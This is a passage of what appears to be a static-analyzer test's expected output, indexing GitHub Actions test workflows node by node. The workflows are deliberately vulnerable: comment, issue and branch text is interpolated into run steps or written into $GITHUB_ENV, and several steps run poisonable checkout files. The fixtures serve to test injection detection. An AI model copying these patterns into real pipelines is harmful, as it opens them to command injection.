"PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -parentNodes -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | -| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | -| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | 